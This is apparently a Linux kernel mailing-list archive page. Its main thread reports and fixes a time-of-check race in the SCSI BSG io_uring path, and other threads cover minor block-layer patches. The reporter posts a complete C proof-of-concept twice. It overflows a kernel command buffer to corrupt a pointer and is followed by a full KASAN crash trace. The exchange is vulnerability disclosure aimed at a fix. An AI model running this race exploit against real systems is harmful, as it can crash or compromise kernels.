Linux block layer

Linux block layer
 help / color / mirror / Atom feed

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Jens Axboe @ 2026-05-27 16:45 UTC (permalink / raw)
  To: Caleb Sander Mateos, Rahul Chandelkar
  Cc: James.Bottomley, martin.petersen, fujita.tomonori, linux-scsi,
	linux-block, io-uring
In-Reply-To: <CADUfDZr6LJckoVt2NRfRt3Njs-WAqsg5-QnTDi6xbUDiO950Fw@mail.gmail.com>

On 5/27/26 10:27 AM, Caleb Sander Mateos wrote:
> On Wed, May 27, 2026 at 9:19 AM Rahul Chandelkar <rc@rexion.ai> wrote:
>>
>> On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
>>> I don't think this is the right way to fix it, ->sqe should've been
>>> stable upfront if this ends up happening. Can you share your poc with
>>> me? Your trace has been trimmed down way too much to be useful.
>>
>> Agreed that a core-level copy before the inline callback would be the
>> right fix and would eliminate the entire class for every uring_cmd
>> driver. The per-driver copy was meant as a minimal backportable fix
>> for the immediate scsi_bsg path.
>>
>> PoC and full trace below.
>>
>> --- PoC (poc_bsg_toctou.c) ---
>>
>> Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
>> Usage:  ./poc /dev/bsg/X
>> Needs:  2+ CPUs, io_uring, /dev/bsg/* access
>>
>> The racer thread flips request_len between 16 (passes the <=32 bounds
>> check) and 128 (used by copy_from_user, overflows scmd->cmnd[32]).
>> The overflow payload plants 0xdead000000001000 at the sense_buffer
>> pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
>> memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
>> corrupted pointer.
> 
> Then the fix is to use READ_ONCE() to access the SQE fields, right?
> Copying the entire SQE seems like unnecessary overhead. See
> nvme_uring_cmd_io() for prior art.

That is indeed the correct fix.

-- 
Jens Axboe


^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Caleb Sander Mateos @ 2026-05-27 16:27 UTC (permalink / raw)
  To: Rahul Chandelkar
  Cc: axboe, James.Bottomley, martin.petersen, fujita.tomonori,
	linux-scsi, linux-block, io-uring
In-Reply-To: <20260527161926.4071110-1-rc@rexion.ai>

On Wed, May 27, 2026 at 9:19 AM Rahul Chandelkar <rc@rexion.ai> wrote:
>
> On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
> > I don't think this is the right way to fix it, ->sqe should've been
> > stable upfront if this ends up happening. Can you share your poc with
> > me? Your trace has been trimmed down way too much to be useful.
>
> Agreed that a core-level copy before the inline callback would be the
> right fix and would eliminate the entire class for every uring_cmd
> driver. The per-driver copy was meant as a minimal backportable fix
> for the immediate scsi_bsg path.
>
> PoC and full trace below.
>
> --- PoC (poc_bsg_toctou.c) ---
>
> Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
> Usage:  ./poc /dev/bsg/X
> Needs:  2+ CPUs, io_uring, /dev/bsg/* access
>
> The racer thread flips request_len between 16 (passes the <=32 bounds
> check) and 128 (used by copy_from_user, overflows scmd->cmnd[32]).
> The overflow payload plants 0xdead000000001000 at the sense_buffer
> pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
> memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
> corrupted pointer.

Then the fix is to use READ_ONCE() to access the SQE fields, right?
Copying the entire SQE seems like unnecessary overhead. See
nvme_uring_cmd_io() for prior art.

Best,
Caleb

>
> Tested on v7.1-rc1, KASAN, QEMU virtio-scsi, 2 vCPUs.
>
> /*
>  * PoC: SCSI BSG uring_cmd TOCTOU heap buffer overflow
>  *
>  * Overflows scmd->cmnd[32] to corrupt sense_buffer pointer.
>  * On successful race, memset(corrupted_sense_buffer, 0, 96) in
>  * scsi_queue_rq() causes a kernel fault proving the vulnerability.
>  *
>  * Usage: ./poc /dev/bsg/X
>  * Build: gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
>  */
>
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <pthread.h>
> #include <sched.h>
> #include <stdatomic.h>
> #include <stdint.h>
> #include <sys/mman.h>
> #include <sys/syscall.h>
> #include <linux/io_uring.h>
>
> struct bsg_uring_cmd {
>         uint64_t request;
>         uint32_t request_len;
>         uint32_t protocol;
>         uint32_t subprotocol;
>         uint32_t max_response_len;
>         uint64_t response;
>         uint64_t dout_xferp;
>         uint32_t dout_xfer_len;
>         uint32_t dout_iovec_count;
>         uint64_t din_xferp;
>         uint32_t din_xfer_len;
>         uint32_t din_iovec_count;
>         uint32_t timeout_ms;
>         uint8_t  reserved[12];
> };
>
> #define QUEUE_DEPTH   4
> #define OVERFLOW_LEN  128
> #define SAFE_LEN      16
>
> static atomic_int stop_flag = 0;
>
> static int sys_io_uring_setup(unsigned entries, struct io_uring_params *p)
> {
>         return syscall(__NR_io_uring_setup, entries, p);
> }
>
> static int sys_io_uring_enter(int fd, unsigned to_submit,
>                               unsigned min_complete, unsigned flags)
> {
>         return syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
>                        flags, NULL, 0);
> }
>
> struct race_ctx {
>         volatile uint32_t *target;
>         int cpu;
> };
>
> static void *racer_thread(void *arg)
> {
>         struct race_ctx *ctx = arg;
>         cpu_set_t cpuset;
>
>         CPU_ZERO(&cpuset);
>         CPU_SET(ctx->cpu, &cpuset);
>         sched_setaffinity(0, sizeof(cpuset), &cpuset);
>
>         while (!atomic_load_explicit(&stop_flag, memory_order_relaxed)) {
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>         }
>         return NULL;
> }
>
> int main(int argc, char **argv)
> {
>         struct io_uring_params params;
>         int ring_fd, bsg_fd;
>         void *sq_ring, *cq_ring, *sqe_ring;
>         unsigned *sq_head, *sq_tail, *sq_mask, *sq_array;
>         unsigned *cq_head, *cq_tail, *cq_mask;
>         size_t sqe_stride;
>         pthread_t racer;
>         struct race_ctx rctx;
>         int i, attempts = 0;
>         int max_attempts = 500000;
>
>         if (argc < 2) {
>                 fprintf(stderr, "Usage: %s /dev/bsg/X\n", argv[0]);
>                 return 1;
>         }
>
>         bsg_fd = open(argv[1], O_RDWR);
>         if (bsg_fd < 0) {
>                 perror("open bsg");
>                 return 1;
>         }
>
>         cpu_set_t cpuset;
>         CPU_ZERO(&cpuset);
>         CPU_SET(0, &cpuset);
>         sched_setaffinity(0, sizeof(cpuset), &cpuset);
>
>         memset(&params, 0, sizeof(params));
>         params.flags = IORING_SETUP_SQE128 | IORING_SETUP_CQE32;
>
>         ring_fd = sys_io_uring_setup(QUEUE_DEPTH, &params);
>         if (ring_fd < 0) {
>                 perror("io_uring_setup");
>                 return 1;
>         }
>
>         size_t sq_ring_sz = params.sq_off.array +
>                             params.sq_entries * sizeof(unsigned);
>         sq_ring = mmap(NULL, sq_ring_sz, PROT_READ | PROT_WRITE,
>                        MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQ_RING);
>
>         sq_head  = sq_ring + params.sq_off.head;
>         sq_tail  = sq_ring + params.sq_off.tail;
>         sq_mask  = sq_ring + params.sq_off.ring_mask;
>         sq_array = sq_ring + params.sq_off.array;
>
>         sqe_stride = 2 * sizeof(struct io_uring_sqe);
>         sqe_ring = mmap(NULL, params.sq_entries * sqe_stride,
>                         PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
>                         ring_fd, IORING_OFF_SQES);
>
>         size_t cqe_size = sizeof(struct io_uring_cqe) + 16;
>         size_t cq_ring_sz = params.cq_off.cqes +
>                             params.cq_entries * cqe_size;
>         cq_ring = mmap(NULL, cq_ring_sz, PROT_READ | PROT_WRITE,
>                        MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_CQ_RING);
>
>         cq_head = cq_ring + params.cq_off.head;
>         cq_tail = cq_ring + params.cq_off.tail;
>         cq_mask = cq_ring + params.cq_off.ring_mask;
>
>         unsigned char payload[OVERFLOW_LEN];
>         memset(payload, 0x41, sizeof(payload));
>         payload[0] = 0x12; /* INQUIRY opcode */
>
>         uint64_t bad_sense = 0xdead000000001000ULL;
>         memcpy(payload + 84, &bad_sense, 8);
>
>         printf("[*] SCSI BSG uring_cmd TOCTOU PoC\n");
>         printf("[*] Target: %s\n", argv[1]);
>         printf("[*] Overflow: %d -> %d bytes (sense_buffer at +84)\n",
>                SAFE_LEN, OVERFLOW_LEN);
>         printf("[*] Bad sense_buffer: 0x%lx\n", (unsigned long)bad_sense);
>
>         rctx.cpu = 1;
>
>         while (attempts < max_attempts) {
>                 unsigned tail = *sq_tail;
>                 unsigned idx = tail & *sq_mask;
>
>                 struct io_uring_sqe *sqe =
>                         (struct io_uring_sqe *)((char *)sqe_ring +
>                                                 idx * sqe_stride);
>                 memset(sqe, 0, sqe_stride);
>
>                 sqe->opcode = IORING_OP_URING_CMD;
>                 sqe->fd = bsg_fd;
>
>                 struct bsg_uring_cmd *cmd =
>                         (struct bsg_uring_cmd *)((char *)sqe + 48);
>
>                 cmd->request     = (uint64_t)(unsigned long)payload;
>                 cmd->request_len = SAFE_LEN;
>                 cmd->protocol    = 0;
>                 cmd->subprotocol = 0;
>                 cmd->max_response_len = 96;
>                 cmd->timeout_ms  = 1000;
>
>                 rctx.target = &cmd->request_len;
>
>                 if (attempts == 0) {
>                         pthread_create(&racer, NULL, racer_thread, &rctx);
>                         usleep(1000);
>                 }
>
>                 sq_array[idx] = idx;
>
>                 cmd->request_len = SAFE_LEN;
>                 __atomic_store_n(sq_tail, tail + 1, __ATOMIC_RELEASE);
>
>                 sys_io_uring_enter(ring_fd, 1, 1, IORING_ENTER_GETEVENTS);
>
>                 while (*cq_head != *cq_tail)
>                         __atomic_store_n(cq_head, *cq_head + 1,
>                                          __ATOMIC_RELEASE);
>
>                 attempts++;
>                 if (attempts % 50000 == 0)
>                         printf("[*] %d attempts...\n", attempts);
>         }
>
>         atomic_store(&stop_flag, 1);
>         pthread_join(racer, NULL);
>
>         printf("[!] %d attempts done. Check dmesg for crash.\n", attempts);
>
>         close(bsg_fd);
>         close(ring_fd);
>         return 0;
> }
>
> --- Full KASAN trace (untruncated) ---
>
> [    4.784469] ==================================================================
> [    4.784815] BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
> [    4.785140] Write of size 96 at addr dead000000001000 by task poc/67
> [    4.785443]
> [    4.785529] CPU: 0 UID: 0 PID: 67 Comm: poc Not tainted 7.1.0-rc1 #2 PREEMPT(lazy)
> [    4.785532] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> [    4.785534] Call Trace:
> [    4.785536]  <TASK>
> [    4.785537]  dump_stack_lvl+0x53/0x70
> [    4.785540]  kasan_report+0xce/0x100
> [    4.785543]  ? scsi_queue_rq+0x4a3/0x58a0
> [    4.785546]  kasan_check_range+0x105/0x1b0
> [    4.785549]  __asan_memset+0x23/0x50
> [    4.785550]  scsi_queue_rq+0x4a3/0x58a0
> [    4.785553]  ? __pfx_scsi_queue_rq+0x10/0x10
> [    4.785556]  ? scsi_mq_get_budget+0xa8/0x670
> [    4.785558]  blk_mq_dispatch_rq_list+0x462/0x42b0
> [    4.785561]  ? blk_mq_rq_ctx_init+0x57a/0xcc0
> [    4.785564]  ? __pfx_blk_mq_dispatch_rq_list+0x10/0x10
> [    4.785566]  ? __pfx__raw_spin_lock+0x10/0x10
> [    4.785569]  __blk_mq_sched_dispatch_requests+0x2e2/0x23a0
> [    4.785574]  ? __pfx___blk_mq_sched_dispatch_requests+0x10/0x10
> [    4.785580]  ? blk_mq_insert_request+0x402/0x13f0
> [    4.785582]  blk_mq_sched_dispatch_requests+0xec/0x270
> [    4.785584]  blk_mq_run_hw_queue+0x797/0x10e0
> [    4.785586]  scsi_bsg_uring_cmd+0x942/0x1570
> [    4.785588]  ? __pfx_scsi_bsg_uring_cmd+0x10/0x10
> [    4.785594]  io_uring_cmd+0x2f6/0x950
> [    4.785599]  __io_issue_sqe+0xb6/0xcc0
> [    4.785601]  io_issue_sqe+0xe5/0x22d0
> [    4.785606]  ? io_uring_cmd_prep+0x619/0xa10
> [    4.785609]  io_submit_sqes+0xb4a/0x4540
> [    4.785614]  __do_sys_io_uring_enter+0x148c/0x2f50
> [    4.785618]  do_syscall_64+0xf9/0x540
> [    4.785621]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
>
> Second fault (completion path reading corrupted sense_buffer):
>
> [    4.799563] KASAN: maybe wild-memory-access in range [0xdead000000001000-0xdead000000001007]
> [    4.800411] RIP: 0010:scsi_normalize_sense+0x47/0x480
> [    4.803461] R12: dead000000001000
> [    4.841254] Kernel panic - not syncing: Fatal exception in interrupt
>
> R12 holds the corrupted sense_buffer pointer (0xdead000000001000),
> confirming the overflow overwrote sense_buffer at the expected offset.
>
> The io_submit_sqes -> io_issue_sqe -> io_uring_cmd -> scsi_bsg_uring_cmd
> path shows this is the inline execution path where the SQE has not been
> copied to kernel memory yet.
>
> Rahul
>

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Rahul Chandelkar @ 2026-05-27 16:19 UTC (permalink / raw)
  To: axboe
  Cc: James.Bottomley, martin.petersen, fujita.tomonori, linux-scsi,
	linux-block, io-uring
In-Reply-To: <ee931505-64a2-411d-8607-3db8912b70c4@kernel.dk>

On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
> I don't think this is the right way to fix it, ->sqe should've been
> stable upfront if this ends up happening. Can you share your poc with
> me? Your trace has been trimmed down way too much to be useful.

Agreed that a core-level copy before the inline callback would be the
right fix and would eliminate the entire class for every uring_cmd
driver. The per-driver copy was meant as a minimal backportable fix
for the immediate scsi_bsg path.

PoC and full trace below.

--- PoC (poc_bsg_toctou.c) ---

Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
Usage:  ./poc /dev/bsg/X
Needs:  2+ CPUs, io_uring, /dev/bsg/* access

The racer thread flips request_len between 16 (passes the <=32 bounds
check) and 128 (used by copy_from_user, overflows scmd->cmnd[32]).
The overflow payload plants 0xdead000000001000 at the sense_buffer
pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
corrupted pointer.

Tested on v7.1-rc1, KASAN, QEMU virtio-scsi, 2 vCPUs.

/*
 * PoC: SCSI BSG uring_cmd TOCTOU heap buffer overflow
 *
 * Overflows scmd->cmnd[32] to corrupt sense_buffer pointer.
 * On successful race, memset(corrupted_sense_buffer, 0, 96) in
 * scsi_queue_rq() causes a kernel fault proving the vulnerability.
 *
 * Usage: ./poc /dev/bsg/X
 * Build: gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

struct bsg_uring_cmd {
	uint64_t request;
	uint32_t request_len;
	uint32_t protocol;
	uint32_t subprotocol;
	uint32_t max_response_len;
	uint64_t response;
	uint64_t dout_xferp;
	uint32_t dout_xfer_len;
	uint32_t dout_iovec_count;
	uint64_t din_xferp;
	uint32_t din_xfer_len;
	uint32_t din_iovec_count;
	uint32_t timeout_ms;
	uint8_t  reserved[12];
};

#define QUEUE_DEPTH   4
#define OVERFLOW_LEN  128
#define SAFE_LEN      16

static atomic_int stop_flag = 0;

static int sys_io_uring_setup(unsigned entries, struct io_uring_params *p)
{
	return syscall(__NR_io_uring_setup, entries, p);
}

static int sys_io_uring_enter(int fd, unsigned to_submit,
			      unsigned min_complete, unsigned flags)
{
	return syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
		       flags, NULL, 0);
}

struct race_ctx {
	volatile uint32_t *target;
	int cpu;
};

static void *racer_thread(void *arg)
{
	struct race_ctx *ctx = arg;
	cpu_set_t cpuset;

	CPU_ZERO(&cpuset);
	CPU_SET(ctx->cpu, &cpuset);
	sched_setaffinity(0, sizeof(cpuset), &cpuset);

	while (!atomic_load_explicit(&stop_flag, memory_order_relaxed)) {
		*ctx->target = OVERFLOW_LEN;
		*ctx->target = OVERFLOW_LEN;
		*ctx->target = OVERFLOW_LEN;
		*ctx->target = OVERFLOW_LEN;
	}
	return NULL;
}

int main(int argc, char **argv)
{
	struct io_uring_params params;
	int ring_fd, bsg_fd;
	void *sq_ring, *cq_ring, *sqe_ring;
	unsigned *sq_head, *sq_tail, *sq_mask, *sq_array;
	unsigned *cq_head, *cq_tail, *cq_mask;
	size_t sqe_stride;
	pthread_t racer;
	struct race_ctx rctx;
	int i, attempts = 0;
	int max_attempts = 500000;

	if (argc < 2) {
		fprintf(stderr, "Usage: %s /dev/bsg/X\n", argv[0]);
		return 1;
	}

	bsg_fd = open(argv[1], O_RDWR);
	if (bsg_fd < 0) {
		perror("open bsg");
		return 1;
	}

	cpu_set_t cpuset;
	CPU_ZERO(&cpuset);
	CPU_SET(0, &cpuset);
	sched_setaffinity(0, sizeof(cpuset), &cpuset);

	memset(&params, 0, sizeof(params));
	params.flags = IORING_SETUP_SQE128 | IORING_SETUP_CQE32;

	ring_fd = sys_io_uring_setup(QUEUE_DEPTH, &params);
	if (ring_fd < 0) {
		perror("io_uring_setup");
		return 1;
	}

	size_t sq_ring_sz = params.sq_off.array +
			    params.sq_entries * sizeof(unsigned);
	sq_ring = mmap(NULL, sq_ring_sz, PROT_READ | PROT_WRITE,
		       MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQ_RING);

	sq_head  = sq_ring + params.sq_off.head;
	sq_tail  = sq_ring + params.sq_off.tail;
	sq_mask  = sq_ring + params.sq_off.ring_mask;
	sq_array = sq_ring + params.sq_off.array;

	sqe_stride = 2 * sizeof(struct io_uring_sqe);
	sqe_ring = mmap(NULL, params.sq_entries * sqe_stride,
			PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
			ring_fd, IORING_OFF_SQES);

	size_t cqe_size = sizeof(struct io_uring_cqe) + 16;
	size_t cq_ring_sz = params.cq_off.cqes +
			    params.cq_entries * cqe_size;
	cq_ring = mmap(NULL, cq_ring_sz, PROT_READ | PROT_WRITE,
		       MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_CQ_RING);

	cq_head = cq_ring + params.cq_off.head;
	cq_tail = cq_ring + params.cq_off.tail;
	cq_mask = cq_ring + params.cq_off.ring_mask;

	unsigned char payload[OVERFLOW_LEN];
	memset(payload, 0x41, sizeof(payload));
	payload[0] = 0x12; /* INQUIRY opcode */

	uint64_t bad_sense = 0xdead000000001000ULL;
	memcpy(payload + 84, &bad_sense, 8);

	printf("[*] SCSI BSG uring_cmd TOCTOU PoC\n");
	printf("[*] Target: %s\n", argv[1]);
	printf("[*] Overflow: %d -> %d bytes (sense_buffer at +84)\n",
	       SAFE_LEN, OVERFLOW_LEN);
	printf("[*] Bad sense_buffer: 0x%lx\n", (unsigned long)bad_sense);

	rctx.cpu = 1;

	while (attempts < max_attempts) {
		unsigned tail = *sq_tail;
		unsigned idx = tail & *sq_mask;

		struct io_uring_sqe *sqe =
			(struct io_uring_sqe *)((char *)sqe_ring +
						idx * sqe_stride);
		memset(sqe, 0, sqe_stride);

		sqe->opcode = IORING_OP_URING_CMD;
		sqe->fd = bsg_fd;

		struct bsg_uring_cmd *cmd =
			(struct bsg_uring_cmd *)((char *)sqe + 48);

		cmd->request     = (uint64_t)(unsigned long)payload;
		cmd->request_len = SAFE_LEN;
		cmd->protocol    = 0;
		cmd->subprotocol = 0;
		cmd->max_response_len = 96;
		cmd->timeout_ms  = 1000;

		rctx.target = &cmd->request_len;

		if (attempts == 0) {
			pthread_create(&racer, NULL, racer_thread, &rctx);
			usleep(1000);
		}

		sq_array[idx] = idx;

		cmd->request_len = SAFE_LEN;
		__atomic_store_n(sq_tail, tail + 1, __ATOMIC_RELEASE);

		sys_io_uring_enter(ring_fd, 1, 1, IORING_ENTER_GETEVENTS);

		while (*cq_head != *cq_tail)
			__atomic_store_n(cq_head, *cq_head + 1,
					 __ATOMIC_RELEASE);

		attempts++;
		if (attempts % 50000 == 0)
			printf("[*] %d attempts...\n", attempts);
	}

	atomic_store(&stop_flag, 1);
	pthread_join(racer, NULL);

	printf("[!] %d attempts done. Check dmesg for crash.\n", attempts);

	close(bsg_fd);
	close(ring_fd);
	return 0;
}

--- Full KASAN trace (untruncated) ---

[    4.784469] ==================================================================
[    4.784815] BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
[    4.785140] Write of size 96 at addr dead000000001000 by task poc/67
[    4.785443] 
[    4.785529] CPU: 0 UID: 0 PID: 67 Comm: poc Not tainted 7.1.0-rc1 #2 PREEMPT(lazy) 
[    4.785532] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    4.785534] Call Trace:
[    4.785536]  <TASK>
[    4.785537]  dump_stack_lvl+0x53/0x70
[    4.785540]  kasan_report+0xce/0x100
[    4.785543]  ? scsi_queue_rq+0x4a3/0x58a0
[    4.785546]  kasan_check_range+0x105/0x1b0
[    4.785549]  __asan_memset+0x23/0x50
[    4.785550]  scsi_queue_rq+0x4a3/0x58a0
[    4.785553]  ? __pfx_scsi_queue_rq+0x10/0x10
[    4.785556]  ? scsi_mq_get_budget+0xa8/0x670
[    4.785558]  blk_mq_dispatch_rq_list+0x462/0x42b0
[    4.785561]  ? blk_mq_rq_ctx_init+0x57a/0xcc0
[    4.785564]  ? __pfx_blk_mq_dispatch_rq_list+0x10/0x10
[    4.785566]  ? __pfx__raw_spin_lock+0x10/0x10
[    4.785569]  __blk_mq_sched_dispatch_requests+0x2e2/0x23a0
[    4.785574]  ? __pfx___blk_mq_sched_dispatch_requests+0x10/0x10
[    4.785580]  ? blk_mq_insert_request+0x402/0x13f0
[    4.785582]  blk_mq_sched_dispatch_requests+0xec/0x270
[    4.785584]  blk_mq_run_hw_queue+0x797/0x10e0
[    4.785586]  scsi_bsg_uring_cmd+0x942/0x1570
[    4.785588]  ? __pfx_scsi_bsg_uring_cmd+0x10/0x10
[    4.785594]  io_uring_cmd+0x2f6/0x950
[    4.785599]  __io_issue_sqe+0xb6/0xcc0
[    4.785601]  io_issue_sqe+0xe5/0x22d0
[    4.785606]  ? io_uring_cmd_prep+0x619/0xa10
[    4.785609]  io_submit_sqes+0xb4a/0x4540
[    4.785614]  __do_sys_io_uring_enter+0x148c/0x2f50
[    4.785618]  do_syscall_64+0xf9/0x540
[    4.785621]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

Second fault (completion path reading corrupted sense_buffer):

[    4.799563] KASAN: maybe wild-memory-access in range [0xdead000000001000-0xdead000000001007]
[    4.800411] RIP: 0010:scsi_normalize_sense+0x47/0x480
[    4.803461] R12: dead000000001000
[    4.841254] Kernel panic - not syncing: Fatal exception in interrupt

R12 holds the corrupted sense_buffer pointer (0xdead000000001000),
confirming the overflow overwrote sense_buffer at the expected offset.

The io_submit_sqes -> io_issue_sqe -> io_uring_cmd -> scsi_bsg_uring_cmd
path shows this is the inline execution path where the SQE has not been
copied to kernel memory yet.

Rahul

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Jens Axboe @ 2026-05-27 16:06 UTC (permalink / raw)
  To: Rahul Chandelkar, James E . J . Bottomley, Martin K . Petersen,
	FUJITA Tomonori
  Cc: linux-scsi, linux-block, io-uring, linux-kernel, stable
In-Reply-To: <20260527105931.3950913-1-rc@rexion.ai>

On 5/27/26 4:59 AM, Rahul Chandelkar wrote:
> scsi_bsg_uring_cmd() and scsi_bsg_map_user_buffer() read bsg_uring_cmd
> fields directly from the shared mmap'd io_uring submission ring via
> io_uring_sqe128_cmd().  On the inline execution path, io_uring has not
> yet copied the SQE to kernel memory, so a concurrent userspace thread
> can modify fields between reads.
> 
> cmd->request_len is read for the bounds check, for the cmd_len
> assignment, and for the copy_from_user length.  A racing thread can
> change request_len between the bounds check (passes with <= 32) and
> copy_from_user (uses the enlarged value), overflowing the 32-byte
> scmd->cmnd[] buffer into subsequent struct scsi_cmnd fields.
> 
> scsi_bsg_map_user_buffer() independently re-derives its cmd pointer
> from the same shared SQE, re-reading dout_xfer_len, din_xfer_len,
> dout_xferp, and din_xferp, enabling direction confusion and buffer
> length races.
> 
> Copy struct bsg_uring_cmd to a stack-local variable before use in both
> functions.  The pointer variable 'cmd' is redirected to the local copy
> so the rest of each function is unchanged.
> 
> Tested with KASAN on QEMU (virtio-scsi, 2 vCPUs).  Without this fix,
> a two-thread race produces:
> 
>   BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
>   Write of size 96 at addr dead000000001000 by task poc/67
>   Call Trace:
>    kasan_report+0xce/0x100
>    __asan_memset+0x23/0x50
>    scsi_queue_rq+0x4a3/0x58a0
>    scsi_bsg_uring_cmd+0x942/0x1570
>    io_uring_cmd+0x2f6/0x950
>    io_issue_sqe+0xe5/0x22d0

I don't think this is the right way to fix it, ->sqe should've been
stable upfront if this ends up happening. Can you share your poc with
me? Your trace has been trimmed down way too much to be useful.

-- 
Jens Axboe

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Bart Van Assche @ 2026-05-27 16:03 UTC (permalink / raw)
  To: Rahul Chandelkar, James E . J . Bottomley, Martin K . Petersen,
	Jens Axboe, FUJITA Tomonori
  Cc: linux-scsi, linux-block, io-uring, linux-kernel, stable
In-Reply-To: <20260527105931.3950913-1-rc@rexion.ai>

On 5/27/26 3:59 AM, Rahul Chandelkar wrote:
> scsi_bsg_uring_cmd() and scsi_bsg_map_user_buffer() read bsg_uring_cmd
> fields directly from the shared mmap'd io_uring submission ring via
> io_uring_sqe128_cmd().  On the inline execution path, io_uring has not
> yet copied the SQE to kernel memory, so a concurrent userspace thread
> can modify fields between reads.
Reviewed-by: Bart Van Assche <bvanassche@acm.org>

^ permalink raw reply

* Re: [PATCH] block: Add bvec_folio()
From: Matthew Wilcox @ 2026-05-27 15:54 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, linux-block, linux-kernel, io-uring, linux-mm,
	Leon Romanovsky
In-Reply-To: <ahaNpbG15d6StT9d@infradead.org>

On Tue, May 26, 2026 at 11:22:29PM -0700, Christoph Hellwig wrote:
> On Tue, May 26, 2026 at 06:47:30PM +0100, Matthew Wilcox wrote:
> > How about:
> > 
> > /**
> >  * bvec_folio - Return the first folio referenced by this bvec
> >  * @bv: bvec to access
> >  *
> >  * bvecs can contain non-folio memory, so this should only be called by
> >  * the creator of the bvec; drivers have no business looking at the owner
> >  * of the memory.  It may not even be the right interface for the caller
> >  * to use as bvecs can span multiple folios.  You may be better off using
> >  * something like bio_for_each_folio_all() which iterates over all folios.
> >  */
> 
> Sounds good, although I'd captialize the first word in the sentence.
> (Not that anyone should follow my spelling advice in general)

I don't know how to capitalise bvec.  Is it Bvec?  BVec?

Fortunately my wife is an expert, and many years ago taught me that if
you have a difficult grammar problem, don't fix it, avoid it.

 * A bvec can contain non-folio memory, so this should only be called by

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Christoph Hellwig @ 2026-05-27 15:39 UTC (permalink / raw)
  To: Haris Iqbal; +Cc: Christoph Hellwig, axboe, linux-block
In-Reply-To: <c09acca3-d674-4671-8e8a-28c80e948266@linux.dev>

On Wed, May 27, 2026 at 05:33:18PM +0200, Haris Iqbal wrote:
> Do you plan to convert similar call patterns in other drivers like drbd, 
> zram, dm, etc, too?

Yes, as-needed.  But I'm happy to leave others to do that as well.

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Haris Iqbal @ 2026-05-27 15:33 UTC (permalink / raw)
  To: Christoph Hellwig, axboe; +Cc: linux-block
In-Reply-To: <20260527151247.2352145-1-hch@lst.de>



On 5/27/26 17:12, Christoph Hellwig wrote:
> Add a helper that sets bi_status and call bio_endio() as that is a very
> common pattern and convert the core block code over to it.
> 
> Signed-off-by: Christoph Hellwig <hch@lst.de>

Looks good:

Reviewed-by: Md Haris Iqbal <haris.iqbal@linux.dev>

Do you plan to convert similar call patterns in other drivers like drbd, 
zram, dm, etc, too?

> ---
>   block/blk-core.c            | 11 ++++-------
>   block/blk-crypto-fallback.c |  9 +++------
>   block/blk-crypto.c          |  3 +--
>   block/blk-merge.c           |  6 ++----
>   block/blk-mq.c              |  6 ++----
>   block/fops.c                |  3 +--
>   include/linux/bio.h         | 19 +++++++++++++++----
>   7 files changed, 28 insertions(+), 29 deletions(-)
> 
> diff --git a/block/blk-core.c b/block/blk-core.c
> index 22af5dec112b..b0f0a304ea0b 100644
> --- a/block/blk-core.c
> +++ b/block/blk-core.c
> @@ -636,12 +636,10 @@ static void __submit_bio(struct bio *bio)
>   		struct gendisk *disk = bio->bi_bdev->bd_disk;
>   	
>   		if ((bio->bi_opf & REQ_POLLED) &&
> -		    !(disk->queue->limits.features & BLK_FEAT_POLL)) {
> -			bio->bi_status = BLK_STS_NOTSUPP;
> -			bio_endio(bio);
> -		} else {
> +		    !(disk->queue->limits.features & BLK_FEAT_POLL))
> +			bio_endio_status(bio, BLK_STS_NOTSUPP);
> +		else
